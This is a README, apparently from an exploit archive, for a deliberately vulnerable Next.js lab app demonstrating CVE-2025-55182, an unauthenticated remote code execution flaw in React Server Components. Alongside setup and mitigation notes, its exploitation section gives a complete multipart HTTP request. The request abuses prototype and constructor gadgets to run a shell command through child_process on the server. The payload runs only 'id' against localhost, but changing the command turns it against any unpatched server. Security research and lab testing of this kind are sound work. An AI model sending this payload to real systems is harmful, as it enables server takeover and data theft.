## https://sploitus.com/exploit?id=28EEA8D6-0547-574D-A458-671B46C0C6C1
# Next.js CVE-2025-55182 Proof of Concept
This is a proof-of-concept Next.js application vulnerable to **CVE-2025-55182** (also known as "React2Shell"), a critical Remote Code Execution (RCE) vulnerability in React Server Components.
## โ ๏ธ WARNING
**This application is intentionally vulnerable and should ONLY be used for:**
- Security research
- Educational purposes
- Testing in isolated environments
**DO NOT:**
- Deploy to production
- Expose to untrusted networks
- Use with sensitive data
## Vulnerability Details
**CVE-2025-55182** affects:
- React versions 19.0.0 through 19.2.0
- Next.js versions 15.x and 16.x (using App Router)
- Applications using React Server Components (RSC)
The vulnerability stems from unsafe deserialization in React Server Components payload handling, allowing unauthenticated attackers to execute arbitrary code on the server via specially crafted HTTP requests.
## Setup Instructions
### Option 1: Local Development
1. **Install dependencies:**
```bash
npm install
```
2. **Run the development server:**
```bash
npm run dev
```
3. **Access the application:**
Open [http://localhost:3000](http://localhost:3000) in your browser.
### Option 2: Docker
1. **Build the Docker image:**
```bash
docker build -t nextjs-cve-2025-55182 .
```
2. **Run the container:**
```bash
docker run --rm -p 3000:3000 nextjs-cve-2025-55182
```
3. **Access the application:**
Open [http://localhost:3000](http://localhost:3000) in your browser.
## Application Structure
- **Login Page** (`/`): A simple login form using React Server Components
- **Dashboard** (`/dashboard`): A protected page accessible after login
## Vulnerable Components
This application uses:
- Next.js 15.1.0 (vulnerable version)
- React 19.0.0 (vulnerable version)
- App Router with React Server Components (RSC)
- Basic create-next-app structure
The vulnerability exists in the RSC payload deserialization mechanism, which can be exploited by sending malicious multipart HTTP requests directly to page routes (e.g., `http://localhost:3000` or `http://localhost:3000/dashboard`). The exploit works on any page using React Server Components.
## Exploitation
The vulnerability can be exploited by sending specially crafted HTTP requests directly to page routes (e.g., `http://localhost:3000` or `http://localhost:3000/dashboard`). The exploit works on any page using React Server Components.
### Quick Exploit Example
```bash
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
The exploit targets page routes directly - works on `localhost:3000` (homepage) or `localhost:3000/dashboard` (dashboard page).
## Mitigation
To fix this vulnerability:
- Upgrade React to version 19.0.1, 19.1.2, or 19.2.1+
- Upgrade Next.js to a patched version (15.0.5+ or 16.x with patches)
## References
- [CVE-2025-55182](https://vulners.com/cve/CVE-2025-55182)
- React Security Advisory
- Next.js Security Advisory
## License
This proof-of-concept is provided for educational and security research purposes only.